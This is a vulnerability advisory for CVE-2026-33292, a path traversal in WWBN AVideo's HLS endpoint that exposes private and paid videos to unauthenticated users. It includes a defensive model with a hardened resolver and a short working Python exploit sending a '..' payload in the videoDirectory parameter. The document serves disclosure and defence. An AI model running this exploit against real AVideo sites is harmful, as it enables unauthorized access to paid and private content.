Security Vulnerability Report
CVE-2026-33292 CVSS 7.5 HIGH

Published: 2026-03-22 17:17:09
Last Modified: 2026-03-23 16:18:24

Description

WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths — one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) — creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue.
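To make the described split concrete, the following is an added Python model (not AVideo's code; the root path, identifiers and function names are hypothetical) of the two divergent uses of `videoDirectory`, a check that flags requests where the authorized directory and the served directory disagree, and a hardened resolver that ties both decisions to one canonical identifier.

```python
import posixpath
from typing import Optional

# Constructed layout standing in for a server's video root (hypothetical,
# not AVideo's real directory structure).
VIDEO_ROOT = "/var/www/videos"


def authorized_video(video_directory: str) -> str:
    """Model of the vulnerable authorization path: only the first segment is
    consulted, so '..' in later segments never reaches the permission check."""
    return video_directory.split("/", 1)[0]


def served_path_vulnerable(video_directory: str, file: str) -> str:
    """Model of the vulnerable file-access path: the raw parameter is joined
    onto the root and '..' segments are honoured when the path is resolved."""
    return posixpath.normpath(posixpath.join(VIDEO_ROOT, video_directory, file))


def split_oracle_detected(video_directory: str, file: str) -> bool:
    """True when the directory the permission check sees differs from the
    directory the file would actually be read from: the CVE's condition."""
    auth_dir = posixpath.join(VIDEO_ROOT, authorized_video(video_directory))
    return posixpath.dirname(served_path_vulnerable(video_directory, file)) != auth_dir


def served_path_hardened(video_directory: str, file: str) -> Optional[str]:
    """Hardened resolver: one plain identifier drives both the permission check
    and the file lookup, and the resolved path must stay inside the directory
    that was authorized. Returns None when the request is rejected.
    On a real filesystem, also canonicalize with os.path.realpath so symlinks
    cannot re-route the resolved path out of the allowed directory."""
    if "/" in video_directory or video_directory in ("", ".", ".."):
        return None  # identifier must be a single, plain directory name
    if "/" in file or file in ("", ".", ".."):
        return None  # segment name must not be a path either
    allowed_dir = posixpath.join(VIDEO_ROOT, video_directory)
    resolved = posixpath.normpath(posixpath.join(allowed_dir, file))
    if posixpath.dirname(resolved) != allowed_dir:
        return None  # resolved path escaped the authorized directory
    return resolved
```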

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo < 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL of the vulnerable endpoint
target_url = "http://example.com/view/hls.php"

# The payload exploits the split-oracle condition.
# The authorization logic truncates at the first '/', checking 'public_video_id'.
# The file access logic processes the full path, traversing to 'private_secret_video'.
payload_params = {
    "videoDirectory": "public_video_id/../../private_videos/private_secret_video",
    "file": "segment.m3u8",
}

try:
    # Send unauthenticated request
    response = requests.get(target_url, params=payload_params, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Retrieved content snippet:")
        print(response.text[:500])
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

Weakness: CWE-22 (Path Traversal)
Patch: https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4
Vendor Advisory (Exploit, Mitigation): https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg
